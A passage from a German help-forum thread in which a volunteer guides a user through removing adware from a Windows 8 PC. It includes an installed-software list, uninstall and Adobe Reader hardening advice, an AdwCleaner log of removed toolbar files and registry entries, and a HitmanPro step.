Java(TM) 7 (64-bit) Oracle 29.03.2012 93,3MB 7.0.0 notwendig
JDownloader 0.9 AppWork GmbH 01.12.2012 0.9 notwendig
K-Lite Mega Codec Pack 7.9.0 02.11.2011 45,2MB 7.9.0 unnötig
Kaspersky Internet Security 2013 Kaspersky Lab 20.02.2013 13.0.1.4190 notwendig
LightScribe System Software LightScribe 14.09.2012 26,3MB 1.18.26.7 unbekannt
LogiEdit (remove only) 01.12.2012 unnötig
Logitech Webcam-Software Logitech Inc. 15.12.2012 2.80 notwendig
MAGIX Speed burnR (MSI) MAGIX AG 31.01.2013 7.0.2.6 unnötig
MAGIX Video deluxe 2013 Premium MAGIX AG 31.01.2013 12.0.0.32 notwendig
MAGIX Video deluxe 2013 Premium (Demo) MAGIX AG 31.01.2013 1.0.0.0 unnötig
MAGIX Video deluxe 2013 Premium (Designelemente) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Digieffects Phenomena) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Filmvorlagen) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Fotoshow Maker-Stile 1) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Fotoshow Maker-Stile 2) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Individuelle Menüvorlagen) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Menüvorlagen 1) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Menüvorlagen 2) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (NewBlueFX Video Essentials IV) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Soundtrack Maker-Stile) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Titeleffekte) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MAGIX Video deluxe 2013 Premium (Tutorials) MAGIX AG 31.01.2013 1.0.0.0 unnötig
MAGIX Video deluxe 2013 Premium (Überblendeffekte) MAGIX AG 31.01.2013 1.0.0.0 notwendig
MakeMKV v1.7.10 GuinpinSoft inc 04.01.2013 v1.7.10 unnötig
Malwarebytes Anti-Malware Version 1.70.0.1100 Malwarebytes Corporation 13.01.2013 18,5MB 1.70.0.1100 notwendig
Media Player Classic - Home Cinema v1.5.2.3456 x64 MPC-HC Team 12.08.2011 21,3MB 1.5.2.3456 notwendig
Mediapurge Peter Lorenz 23.12.2012 5,00MB 1.10 unbekannt
Microsoft .NET Framework 4 Client Profile 09.08.2011 notwendig
Microsoft .NET Framework 4 Client Profile DEU Language Pack 09.08.2011 notwendig
Microsoft .NET Framework 4 Extended 09.08.2011 notwendig
Microsoft .NET Framework 4 Extended DEU Language Pack 09.08.2011 notwendig
Microsoft Office File Validation Add-In Microsoft Corporation 15.09.2011 7,95MB 14.0.5130.5003 notwendig
Microsoft Office FrontPage 2003 Microsoft Corporation 09.01.2013 264MB 11.0.8173.0 notwendig
Microsoft Office Live Add-in 1.5 Microsoft Corporation 22.04.2012 508KB 2.0.4024.1 notwendig
Microsoft Office Professional Edition 2003 Microsoft Corporation 13.02.2013 905MB 11.0.8173.0 notwendig
Microsoft Office Professional Plus 2010 Microsoft Corporation 01.12.2012 14.0.6029.1000 notwendig
Microsoft Silverlight Microsoft Corporation 17.05.2012 50,6MB 5.1.10411.0 notwendig
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 28.08.2011 1,69MB 3.1.0000 unbekannt
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 Microsoft Corporation 25.01.2012 250KB 8.0.50727.4053 unbekannt
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 18.09.2011 300KB 8.0.59193 unbekannt
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 10.08.2011 620KB 8.0.61000 unbekannt
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 Microsoft Corporation 21.09.2012 246KB 9.0.30729.5570 unbekannt
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 Microsoft Corporation 09.08.2011 788KB 9.0.30729.4148 unbekannt
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 28.08.2011 788KB 9.0.30729.6161 unbekannt
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 04.01.2013 1,97MB 9.0.21022 unbekannt
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 01.08.2012 240KB 9.0.30729 unbekannt
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 08.10.2011 586KB 9.0.30729.4148 unbekannt
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 09.10.2011 600KB 9.0.30729.6161 unbekannt
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 02.08.2012 15,2MB 10.0.40219 unbekannt
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 02.08.2012 15,0MB 10.0.40219 unbekannt
Microsoft WSE 3.0 Runtime Microsoft Corp. 19.02.2012 942KB 3.0.5305.0 unbekannt
MiniTool Partition Wizard Home Edition 7.7 MiniTool Solution Ltd. 05.02.2013 46,2MB notwendig
MixMeister BPM Analyzer 1.0 MixMeister Technology LLC 23.12.2012 notwendig
Mozilla Firefox 18.0.2 (x86 de) Mozilla 21.02.2013 82,7MB 18.0.2 notwendig
Mozilla Maintenance Service Mozilla 21.02.2013 329KB 17.0.3 unbekannt
Mozilla Thunderbird 17.0.3 (x86 de) Mozilla 21.02.2013 41,9MB 17.0.3 notwendig
MP3Cover 23.12.2012 notwendig
MP3NewCover V.0.0.1.5 Timo-T 23.12.2012 1,89MB notwendig
Mp3tag v2.54 Florian Heidenreich 30.12.2012 v2.54 notwendig
MSXML 4.0 SP3 Parser Microsoft Corporation 31.01.2013 2,86MB 4.30.2100.0 unbekannt
MSXML 4.0 SP3 Parser (KB2758694) Microsoft Corporation 09.02.2013 2,90MB 4.30.2117.0 unbekannt
MyTomTom 3.2.0.802 TomTom 01.12.2012 3.2.0.802 notwendig
Naviextras Toolbox NNG Llc. 12.01.2013 3.11.0.24188 notwendig
Naviextras Toolbox Prerequesities NNG Llc. 12.01.2013 4,08MB 1.0.0 notwendig
NEC Electronics USB 3.0 Host Controller Driver NEC Electronics Corporation 09.08.2011 993KB 1.0.19.0 notwendig
Nero Backup Drivers Nero AG 01.08.2012 94,0KB 1.0.11100.8.0 unnötig
Nero BurningROM 12 Nero AG 09.11.2012 253MB 12.0.00300 unnötig
Netzmanager 09.08.2011 unnötig
Netzmanager Deutsche Telekom AG 01.12.2012 1.071 unnötig
NHL09 Liveticker NHL09 Liveticker 01.12.2012 1.1.0.0 unnötig
NHL® 09 Electronic Arts 10.08.2011 3,01GB 2.0.1.0 notwendig
NHL™ 09 Electronic Arts 17.10.2012 3,01GB 2.0.1.0 notwendig
OpenOffice.org 3.3 OpenOffice.org 08.10.2011 414MB 3.3.9567 unnötig
Origin Electronic Arts, Inc. 01.12.2012 8.5.2.23 notwendig
PS3 Media Server PS3 Media Server 01.12.2012 94,6MB 1.70.1 notwendig
QuickStores-Toolbar 1.1.0 AB-Tools.com 18.01.2012 944KB 1.1.0 unbekannt
QuickTime Apple Inc. 04.12.2012 73,1MB 7.73.80.64 unnötig
Realtek Ethernet Controller Driver For Windows 7 Realtek 14.10.2012 7.17.304.2010 notwendig
Safari Apple Inc. 02.06.2012 104MB 5.34.57.2 unnötig
Samsung Kies Samsung Electronics Co., Ltd. 10.10.2012 183MB 2.5.0.12094_27 notwendig
SAMSUNG USB Driver for Mobile Phones SAMSUNG Electronics Co., Ltd. 01.01.2013 24,1MB 1.5.16.0 notwendig
SatChannelListEditor Elemental 05.02.2013 877KB 4.7.0 notwendig
Secure Download Manager Kivuto Solutions Inc. 29.11.2012 935KB 3.1.0 unbekannt
Simple Shutdown Timer PcWinTech.com 24.12.2012 1.1.2 unnötig
Skype™ 6.1 Skype Technologies S.A. 02.02.2013 21,1MB 6.1.129 notwendig
Star Wars: The Old Republic Electronic Arts, Inc. 01.12.2012 13,1MB 1.00 notwendig
Steel Beasts Pro PE eSim Games, LLC 17.02.2013 2,85GB 2.53.800 notwendig
TeamSpeak 3 Client TeamSpeak Systems GmbH 01.12.2012 unnötig
Total Commander 64-bit (Remove or Repair) Ghisler Software GmbH 30.12.2012 8.01 unnötig
Tropico 4 1.00 Kalypso Media 01.12.2012 1.00 unnötig
Vasco da Gama 6 HDPro MotionStudios 01.02.2013 99,5MB 6.00.0000 unnötig
VIA Plattform-Geräte-Manager VIA Technologies, Inc. 09.08.2011 2,61MB 1.34 unbekannt
Video Essentials IV for Magix NewBlue 01.02.2013 3.0 unnötig
Visual Studio C++ 10.0 Runtime TomTom International B.V. 10.03.2012 8,00KB 10.0.0 unbekannt
VLC media player 1.1.11 VideoLAN 01.12.2012 1.1.11 notwendig
Winamp Nullsoft, Inc 23.12.2012 5.63 unnötig
Winamp Erkennungs-Plug-in Nullsoft, Inc 23.12.2012 75,0KB 1.0.0.1 unnötig
Windows Live Essentials Microsoft Corporation 28.08.2011 15.4.3538.0513 unbekannt
Windows Live Mesh ActiveX control for remote connections Microsoft Corporation 28.08.2011 5,57MB 15.4.5722.2 unbekannt
WinRAR 4.01 (64-Bit) win.rar GmbH 01.12.2012 4.01.0 notwendig
Yahoo! Messenger Yahoo! Inc. 01.12.2012 notwendig

markusg 27.02.2013 23:25

deinstaliere:
Adobe Flash Player alle
Adobe - Adobe Flash Player installieren
neueste version laden, instalieren.
adobe reader:
Adobe - Adobe Reader herunterladen - Alle Versionen
haken bei mcafee security scan raus nehmen

bitte auch mal den adobe reader wie folgt konfigurieren:
adobe reader öffnen, bearbeiten, voreinstellungen.
allgemein:
nur zertifizierte zusatz module verwenden, anhaken.
Sicherheit (erweitert)
Erweiterte Sicherheit anhaken
und alle Dateien auswählen.
internet:
hier sollte alles deaktiviert werden, es ist sehr unsicher pdfs automatisch zu öffnen, zu downloaden etc.
es ist immer besser diese direkt abzuspeichern da man nur so die kontrolle hat was auf dem pc vor geht.
bei javascript den haken bei java script verwenden raus nehmen
bei updater, automatisch instalieren wählen.
übernehmen /ok



deinstaliere:
Digieffects
FILSHtray
Free Studio
Fussball
Google Earth
HandBrake
ipswDownloader
Java(TM) : alle
K-Lite
LightScribe
LogiEdit
MAGIX : unnötige
MakeMKV
Mediapurge
Nero : alle
Netzmanager : beide
OpenOffice
QuickStores
Safari
Secure
Simple
TeamSpeak
Total
Tropico
Vasco
Video Essentials
Winamp : beide
Windows Live : alle für dich unnötigen

Öffne CCleaner, analysieren, starten, PC neustarten.

Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

MrVain712 28.02.2013 00:03

AdwCleaner Logfile:
Code:

# AdwCleaner v2.113 - Datei am 27/02/2013 um 23:58:34 erstellt
# Aktualisiert am 23/02/2013 von Xplode
# Betriebssystem : Windows 8 Pro  (64 bits)
# Benutzer : Mr.Vain - MRVAIN-PC
# Bootmodus : Normal
# Ausgeführt unter : C:\Users\Mr.Vain\Downloads\adwcleaner.exe
# Option [Löschen]


**** [Dienste] ****


***** [Dateien / Ordner] *****

Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\QuickStores.url
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Microsoft\Windows\Start Menu\QuickStores.url
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\keycnogl.default\searchplugins\icqplugin.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\11-suche.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\Conduit.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\daemon-search.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\icqplugin.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\icqplugin-1.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\icqplugin-2.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\icqplugin-3.xml
Datei Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\searchplugins\web-search.xml
Ordner Gelöscht : C:\Program Files (x86)\Babylon
Ordner Gelöscht : C:\Program Files (x86)\Mozilla Firefox\Extensions\quickstores@quickstores.de
Ordner Gelöscht : C:\Program Files\Babylon
Ordner Gelöscht : C:\ProgramData\~0
Ordner Gelöscht : C:\Users\Mr.Vain\AppData\LocalLow\facemoods.com
Ordner Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\dvdvideosoftiehelpers
Ordner Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\keycnogl.default\extensions\{800b5000-a755-47e1-992b-48a1c1357f07}
Ordner Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\extensions\DTToolbar@toolbarnet.com
Ordner Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\extensions\vshare@toolbar
Ordner Gelöscht : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\Smartbar
Ordner Gelöscht : C:\WINDOWS\assembly\GAC_MSIL\QuickStoresToolbar

***** [Registrierungsdatenbank] *****

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\SmartBar
Schlüssel Gelöscht : HKCU\Software\InstallCore
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10EDB994-47F8-43F7-AE96-F2EA63E9F90F}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{10EDB994-47F8-43F7-AE96-F2EA63E9F90F}
Schlüssel Gelöscht : HKCU\Software\Softonic
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{5B1881D1-D9C7-46DF-B041-1E593282C7D0}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\BabylonHelper.EXE
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\facemoods.facemoodsHlpr
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\facemoods.facemoodsHlpr.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Prod.cap
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{09C554C3-109B-483C-A06B-F14172F1A947}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{11549FE4-7C5A-4C17-9FC3-56FC5162A994}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{2EECD738-5844-4A99-B4B6-146BF802613B}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{97F2FF5B-260C-4CCF-834A-2DDA4E29E39E}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{98889811-442D-49DD-99D7-DC866BE87DBC}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Schlüssel Gelöscht : HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{826D7151-8D99-434B-8540-082B8C2AE556}
Schlüssel Gelöscht : HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{A9379648-F6EB-4F65-A624-1C10411A15D0}
Schlüssel Gelöscht : HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{F16AB1DB-15C0-4456-A29E-4DF24FB9E3D2}
Schlüssel Gelöscht : HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dhkplhfnhceodhffomolpfigojocbpcb
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{0BF91075-F457-4A8B-99EF-140B52D2F22A}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{37425600-CB21-49A0-8659-476FBAB0F8E8}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{431FB0E5-2CBB-4602-9FE6-F1D64488ADD7}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{5C9A230D-70A5-11D5-AFB0-0050DAC67890}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{5F339F0B-716F-408F-A627-DEEB5DEB4020}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{8911483C-C00A-4183-9FBC-6C9C00946C15}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{95734BDE-B702-45B9-86E5-27676729F904}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{A9379648-F6EB-4F65-A624-1C10411A15D0}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{C3F058A9-407D-4CD1-8F66-B75605B54B69}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{D0482C8E-BAEA-4943-911A-B661060F56A7}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{EFDCAF05-D29C-4D4D-9836-8CDCD606A6B2}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{F16AB1DB-15C0-4456-A29E-4DF24FB9E3D2}
Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\extensions [{acaa314b-eeba-48e4-ad47-84e31c44796c}]
Wert Gelöscht : HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar [{10EDB994-47F8-43F7-AE96-F2EA63E9F90F}]

***** [Internet Browser] *****

-\\ Internet Explorer v10.0.9200.16482

[OK] Die Registrierungsdatenbank ist sauber.

-\\ Mozilla Firefox v18.0.2 (de)

Datei : C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\prefs.js

C:\Users\Mr.Vain\AppData\Roaming\Mozilla\Firefox\Profiles\s4aa0nfx.default\user.js ... Gelöscht !

Gelöscht : user_pref("CT2269050.1000082.isPlayDisplay", "true");
Gelöscht : user_pref("CT2269050.1000082.state", "{\"state\":\"stopped\",\"text\":\"Hotmix 108\",\"description\"[...]
Gelöscht : user_pref("CT2269050.1000234.TWC_TMP_city", "BERLIN");
Gelöscht : user_pref("CT2269050.1000234.TWC_TMP_country", "DE");
Gelöscht : user_pref("CT2269050.ENABALE_HISTORY", "{\"dataType\":\"string\",\"data\":\"true\"}");
Gelöscht : user_pref("CT2269050.ENABLE_RETURN_WEB_SEARCH_ON_THE_PAGE", "{\"dataType\":\"string\",\"data\":\"tru[...]
Gelöscht : user_pref("CT2269050.FirstTime", "true");
Gelöscht : user_pref("CT2269050.FirstTimeFF3", "true");
Gelöscht : user_pref("CT2269050.SearchFromAddressBarUrl", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT226[...]
Gelöscht : user_pref("CT2269050.UserID", "UN22115547778470495");
Gelöscht : user_pref("CT2269050.addressBarTakeOverEnabledInHidden", "true");
Gelöscht : user_pref("CT2269050.autoDisableScopes", -1);
Gelöscht : user_pref("CT2269050.browser.search.defaultthis.engineName", true);
Gelöscht : user_pref("CT2269050.defaultSearch", "true");
Gelöscht : user_pref("CT2269050.embeddedsData", "[{\"appId\":\"128834881989343895\",\"apiPermissions\":{\"cross[...]
Gelöscht : user_pref("CT2269050.enableAlerts", "false");
Gelöscht : user_pref("CT2269050.enableSearchFromAddressBar", "true");
Gelöscht : user_pref("CT2269050.firstTimeDialogOpened", "true");
Gelöscht : user_pref("CT2269050.fixPageNotFoundError", "true");
Gelöscht : user_pref("CT2269050.fixPageNotFoundErrorInHidden", "true");
Gelöscht : user_pref("CT2269050.installId", "ConduitNSISIntegration");
Gelöscht : user_pref("CT2269050.installType", "ConduitNSISIntegration");
Gelöscht : user_pref("CT2269050.isEnableAllDialogs", "{\"dataType\":\"string\",\"data\":\"true\"}");
Gelöscht : user_pref("CT2269050.isNewTabEnabled", true);
Gelöscht : user_pref("CT2269050.isPerformedSmartBarTransition", "true");
Gelöscht : user_pref("CT2269050.isToolbarShrinked", "{\"dataType\":\"string\",\"data\":\"false\"}");
Gelöscht : user_pref("CT2269050.keyword", true);
Gelöscht : user_pref("CT2269050.navigationAliasesJson", "{\"EB_SEARCH_TERM\":\"d.“\\r\\n\\r\\nWas war denn hier[...]
Gelöscht : user_pref("CT2269050.openThankYouPage", "false");
Gelöscht : user_pref("CT2269050.openUninstallPage", "true");
Gelöscht : user_pref("CT2269050.search.searchAppId", "128834881989343895");
Gelöscht : user_pref("CT2269050.search.searchCount", "0");
Gelöscht : user_pref("CT2269050.searchInNewTabEnabledInHidden", "true");
Gelöscht : user_pref("CT2269050.selectToSearchBoxEnabled", "{\"dataType\":\"string\",\"data\":\"true\"}");
Gelöscht : user_pref("CT2269050.serviceLayer_service_login_isFirstLoginInvoked", "{\"dataType\":\"boolean\",\"d[...]
Gelöscht : user_pref("CT2269050.serviceLayer_service_login_loginCount", "{\"dataType\":\"number\",\"data\":\"2\[...]
Gelöscht : user_pref("CT2269050.serviceLayer_service_toolbarGrouping_activeCTID", "{\"dataType\":\"string\",\"d[...]
Gelöscht : user_pref("CT2269050.serviceLayer_service_toolbarGrouping_activeDownloadUrl", "{\"dataType\":\"strin[...]
Gelöscht : user_pref("CT2269050.serviceLayer_service_toolbarGrouping_activeToolbarName", "{\"dataType\":\"strin[...]
Gelöscht : user_pref("CT2269050.serviceLayer_service_toolbarGrouping_invoked", "{\"dataType\":\"string\",\"data[...]
Gelöscht : user_pref("CT2269050.serviceLayer_service_usage_toolbarUsageCount", "{\"dataType\":\"number\",\"data[...]
Gelöscht : user_pref("CT2269050.serviceLayer_services_appTrackingFirstTime_lastUpdate", "1339689648699");
Gelöscht : user_pref("CT2269050.serviceLayer_services_appTracking_lastUpdate", "1339689649812");
Gelöscht : user_pref("CT2269050.serviceLayer_services_appsMetadata_lastUpdate", "1339689647382");
Gelöscht : user_pref("CT2269050.serviceLayer_services_gottenAppsContextMenu_lastUpdate", "1339689649221");
Gelöscht : user_pref("CT2269050.serviceLayer_services_login_10.10.2.10_lastUpdate", "1339689649326");
Gelöscht : user_pref("CT2269050.serviceLayer_services_optimizer_lastUpdate", "1339689649101");
Gelöscht : user_pref("CT2269050.serviceLayer_services_otherAppsContextMenu_lastUpdate", "1339689649238");
Gelöscht : user_pref("CT2269050.serviceLayer_services_searchAPI_lastUpdate", "1339689647080");
Gelöscht : user_pref("CT2269050.serviceLayer_services_serviceMap_lastUpdate", "1339689644825");
Gelöscht : user_pref("CT2269050.serviceLayer_services_toolbarContextMenu_lastUpdate", "1339689649189");
Gelöscht : user_pref("CT2269050.serviceLayer_services_toolbarSettings_lastUpdate", "1339689645261");
Gelöscht : user_pref("CT2269050.serviceLayer_services_translation_lastUpdate", "1339689647415");
Gelöscht : user_pref("CT2269050.settingsINI", true);
Gelöscht : user_pref("CT2269050.shouldFirstTimeDialog", "false");
Gelöscht : user_pref("CT2269050.smartbar.CTID", "CT2269050");
Gelöscht : user_pref("CT2269050.smartbar.Uninstall", "0");
Gelöscht : user_pref("CT2269050.smartbar.homepage", true);
Gelöscht : user_pref("CT2269050.smartbar.toolbarName", "DVDVideoSoftTB ");
Gelöscht : user_pref("CT2269050.startPage", "userChanged");
Gelöscht : user_pref("CT2269050.toolbarBornServerTime", "14-6-2012");
Gelöscht : user_pref("CT2269050.toolbarCurrentServerTime", "14-6-2012");
Gelöscht : user_pref("CT2269050.toolbarDisabled", "true");
Gelöscht : user_pref("Smartbar.ConduitHomepagesList", "");
Gelöscht : user_pref("Smartbar.ConduitSearchEngineList", "DVDVideoSoftTB Customized Web Search");
Gelöscht : user_pref("Smartbar.ConduitSearchUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT2269050[...]
Gelöscht : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&s[...]
Gelöscht : user_pref("Smartbar.keywordURLSelectedCTID", "CT2269050");
Gelöscht : user_pref("extensions.facemoods._xpiupdate", true);
Gelöscht : user_pref("extensions.facemoods.aflt", "_#ddrnw");
Gelöscht : user_pref("extensions.facemoods.fcmdVrsn", "1.2.7.5.2");
Gelöscht : user_pref("extensions.facemoods.firstRun", false);
Gelöscht : user_pref("extensions.facemoods.first_time", false);
Gelöscht : user_pref("extensions.facemoods.id", "_#9d20c2bd89d84e04b64d085c3f9638ca");
Gelöscht : user_pref("extensions.facemoods.instlDay", "_#15200");
Gelöscht : user_pref("extensions.facemoods.lastActv", "14");
Gelöscht : user_pref("extensions.facemoods.prtnrId", "_#facemoods.com");
Gelöscht : user_pref("extensions.facemoods.sid", "_#9d20c2bd89d84e04b64d085c3f9638ca");
Gelöscht : user_pref("extensions.facemoods.update", "_#v1.4.0");
Gelöscht : user_pref("extensions.facemoods.vrsn", "_#1.4.17.5");
Gelöscht : user_pref("vshare.install.date", "1315940057");
Gelöscht : user_pref("vshare.install.finished", "1.0.0");
Gelöscht : user_pref("vshare.install.fresh", "false");
Gelöscht : user_pref("vshare.install.guid", "{6b65b85e-9d29-4d83-90bb-2ac3654eccd5}");
Gelöscht : user_pref("vshare.install.newtab", false);

-\\ Google Chrome v25.0.1364.97

Datei : C:\Users\Mr.Vain\AppData\Local\Google\Chrome\User Data\Default\Preferences

[OK] Die Datei ist sauber.

*************************

AdwCleaner[S1].txt - [13789 octets] - [27/02/2013 23:58:34]

########## EOF - C:\AdwCleaner[S1].txt - [13850 octets] ##########

--- --- ---

markusg 28.02.2013 00:10

HitmanPro - Download - Filepony
lade hitmanpro
doppelklicken.
lizenz, Testlizenz.
Auf scan, nichts löschen.
auf weiter, Log als xml exportieren und posten, bzw packen und anhängen

MrVain712 28.02.2013 20:11

hier das Ergebnis, wobei ich sagen muss:

- NHL09RosterPatch.exe
- NHLSeasonStatisticsExporter.exe

sind zu 99,9% keine Malware, diese beiden Tools brauch ich u.a. dafür, um Daten aus dem Spiel exportieren zu können.

markusg 28.02.2013 20:20

dann lösch mal alles, außer die beiden.
neustarten und neues otl log posten


Alle Zeitangaben in WEZ +1. Es ist jetzt 19:53 Uhr.

Copyright ©2000-2024, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130